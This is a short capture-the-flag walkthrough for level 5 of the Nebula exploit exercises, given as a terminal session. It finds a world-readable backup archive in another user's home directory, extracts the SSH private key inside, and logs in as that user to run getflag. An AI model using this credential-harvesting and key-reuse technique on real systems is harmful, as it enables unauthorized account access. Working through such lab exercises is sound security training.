Exploit Excercises - Nebula: Level 5

level05@nebula:~$ ls -al /home/flag05/
total 5
drwxr-x--- 4 flag05 level05   93 2012-08-18 06:56 .
drwxr-xr-x 1 root   root     160 2012-08-27 07:18 ..
drwxr-xr-x 2 flag05 flag05    42 2011-11-20 20:13 .backup
-rw-r--r-- 1 flag05 flag05   220 2011-05-18 02:54 .bash_logout
-rw-r--r-- 1 flag05 flag05  3353 2011-05-18 02:54 .bashrc
-rw-r--r-- 1 flag05 flag05   675 2011-05-18 02:54 .profile
drwx------ 2 flag05 flag05    70 2011-11-20 20:13 .ssh

level05@nebula:~$ ls -al /home/flag05/.backup/
total 2
drwxr-xr-x 2 flag05 flag05    42 2011-11-20 20:13 .
drwxr-x--- 4 flag05 level05   93 2012-08-18 06:56 ..
-rw-rw-r-- 1 flag05 flag05  1826 2011-11-20 20:13 backup-19072011.tgz

level05@nebula:~$ tar -ztvf /home/flag05/.backup/backup-19072011.tgz
drwxr-xr-x user/user         0 2011-07-19 02:37 .ssh/
-rw-r--r-- user/user       394 2011-07-19 02:37 .ssh/id_rsa.pub
-rw------- user/user      1675 2011-07-19 02:37 .ssh/id_rsa
-rw-r--r-- user/user       394 2011-07-19 02:37 .ssh/authorized_keys

level05@nebula:~$ tar -zxvf /home/flag05/.backup/backup-19072011.tgz
.ssh/
.ssh/id_rsa.pub
.ssh/id_rsa
.ssh/authorized_keys

level05@nebula:~$ ssh flag05@192.168.1.64
The authenticity of host '192.168.1.64 (192.168.1.64)' can't be established.
ECDSA key fingerprint is ea:8d:09:1d:f1:69:e6:1e:55:c7:ec:e9:76:a1:37:f0.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.1.64' (ECDSA) to the list of known hosts.

[ ... ]

flag05@nebula:~$ getflag
You have successfully executed getflag on a target account